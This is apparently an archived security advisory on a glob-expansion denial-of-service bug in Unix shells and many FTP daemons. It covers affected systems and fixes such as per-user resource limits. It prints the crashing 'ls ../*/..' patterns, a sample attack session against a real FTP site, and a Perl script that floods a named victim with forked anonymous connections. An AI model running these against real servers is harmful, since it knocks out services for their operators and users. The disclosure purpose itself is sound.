COMMAND
kernel
SYSTEMS AFFECTED
kernel
PROBLEM
Wakko Ellington Warner-Warner III found following. If You do:
# ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
Wait a few minutes, let the disks churn (it never stops!)
Break out of it...
# vmstat
cannot fork: no swap space
# w
cannot fork: no swap space
Have fun hard-resetting your Sun box... We got the same results
as the original poster on Solaris 2.6 (a sparc 2 with 32Mb memory)
and the same as Jason on a Linux system (Redhad 6.2, with 128Mb).
On the Sol.2.6 system it would run until it gets a:
# ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
no stack space
# uptime
cannot fork: no swap space
and it required a reboot to free it up. But only as root, as a
normal user we got the same as the linux system (which was the
same as either root or a reqular user).
On Linux Slackware 7.0 after some time You get Your shell killed.
On FreeBSD 4.2 generic there's no response from the box. On
OpenBSD 2.7 (with softupdates) the hard disk begin to do a evil
noise and nothing happened untill You control-c the ls after 4
hours (486). On NetBSD 1.5 the shell will stop responding to
commands. On Mandrake 7.2, and the system becomes very unstable
and freezes in the end. You have to hard reset the computer.
Proftpd built-in 'ls' command has a globbing bug that allows
remote denial-of-service. Here's a simple exploit, tested on the
Proftpd site:
$ ftp ftp.proftpd.org
...
Name (ftp.proftpd.org:j): ftp
...
230 Anonymous access granted, restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
227 Entering Passive Mode (216,10,40,219,4,111).
421 Service not available, remote server timed out. Connection closed
That command takes 100% CPU time on the server. It can lead into
an easy DOS even if few remote simultanous connections are
allowed.
Other FTP servers may be concerned as well. Here are various
tries:
- NetBSD FTP showed the same behavior than Proftpd,
- Microsoft FTP showed the same behavior than Proftpd,
- In an ironic twist, PureFTPd (of which you are apparently the
author), is indeed vulnerable to this globbing bug, using
variants of the string you previously posted. Try:
ls .*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/
ls */.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/
- BeroFTPD version 1.3.4 is also vulnerable.
- Safe to say all BSD ftpd's are vunerable.
- all Solaris boxes
- ftpd-BSD-0.2.3-4 port for linux is also vulnerable
- this to consume 100% of CPU cycles and 40% of Cobalt RaQ server's
512MB of RAM (at the time I killed it), running ProFTPD 1.2.0pre9
on Linux 2.2.14.
- Winsock FTPD 3.00 pro and 2.41 (maybe prior) are vulnerable
This is not just an ftpd issue, it's a shell expansion issue. You
can DoS the affected servers with ls issued from the shell as
shown above.
Here are th the results with different shells:
- tcsh ran out of memory after 2 or 3 minutes, used 100% of the
cpu to the point of noticable delays in other running
jobs.
- csh ran out of memory after 5 or 6 minutes, used 100% of the
cpu but didn't seem to cause serious delays
- bash seg faulted after 6 minutes, didn't start using 100%% cpu
only 20 to 99, after 5 mintes in started hammering the
disk and used WAY more than 100% cpu causing signification
delays in other jobs
- ksh killed it after 20 minutes, used 100% of the cpu, started
using but not hammering the disk after 10 minutes
Here is the sample exploit code:
#!/usr/bin/perl -w
# Death accelerator for FTP servers (C) Ninja 2001
# This is for educational purposes only
# All credits go to Gore, my old parakeet who c0des perl better than me
# Just tweak the connections number to bring a swifter death to your machine
# Ain't life a bitch ? Hehe...
use Net::FTP;
if($#ARGV==-1) {
# Print help file
print ("\n Usage: $0 [victim] [port] [connections] \n");
}
else {
($victim,$port,$conn)=@ARGV;
print "Attacking $victim:$port with $conn connections\n";
for($i=0;$i<$conn;$i++) {
$procid=fork();
if($procid==0){
$ftp=Net::FTP->new("$victim", Port=>$port, Passive=>1);
$ftp->login("anonymous",'bitch@kiddie.box');
$ftp->ascii();
$ftp->ls("*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*");
$ftp->quit();
}
}
}
SOLUTION
It's a simple resource starvation issue. The _shell_ process will
keep eating memory as it tries to do the glob on the command line.
Since root is not subject to resource limits, the shell will keep
eating memory until you are out of swap, and apparently, if you
needed to cold restart the box, your Solaris setup does not like
to run out of swap. So, this is just a shell expansion that gets
a little carried away. ls ../* expands to parent directory, all
files ls ../*/../* expands to parent directory, all files, parent
directory, all files....nice little loop if the parent directory
has a child (which it obviously does since we're in one).
The machine will only crash if you've instructed it to allow bash
to allocate memory indefinitely. Unless you trust your users not
to be malicious or incompetent you should have kernel-enforced
limits in place to prevent this.
WFTP released 3.00 R4 to fix this vulnerability. [They now refuse
to list any parameter list containing "/.."]
Set limits on userspace processes, in e.g. Red Hat
/etc/security/limits.conf and ensure that your limits reflect the
capabilities of the hardware. Getting this perfect is very hard,
but getting it good enough to deter casual vandals or thoughtless
users is quite easy.
It is arguable that the FTP daemon is responsible for doing
argument checking to prevent DOS attacks, but bash can hardly be
held to the same standard.
Except for the FTP daemons which work in novel ways, this is not
even a denial of service attack. Typically, the parent, listening
daemon spawns a new process for each control connection. If the
person who is connected to the daemon then uses the above "attack"
they kill their own daemon. They could do the same thing by
logging off. The parent daemon is not affected nor are other
users currently connected. (Assuming that there are sane resource
limits in place of course).
What 'novel' daemons might be affected by this? Those that have
different user IDs not associated with different system user IDs.
In this case, the operating system cannot differentiate between
different FTP users, thus one user can DoS the others by
exhausting shared resources. However, some very clever daemons
may have resource limitations per-user within their own user base.
Before people start running around trying to filter 'ls' arguments
in the daemon, the correct solution to the "problem" is proper
resource limitations per user (there are undoubtably other
resource attacks through an FTP daemon too). For users at the
operating system level, most OSes have resource-limiting
capabilities, so it is just a matter of doing it. The real issue
is fixing FTP daemons with their own user bases that do not have
the capability to impose their own per-user resource limits.
That's the only bug here.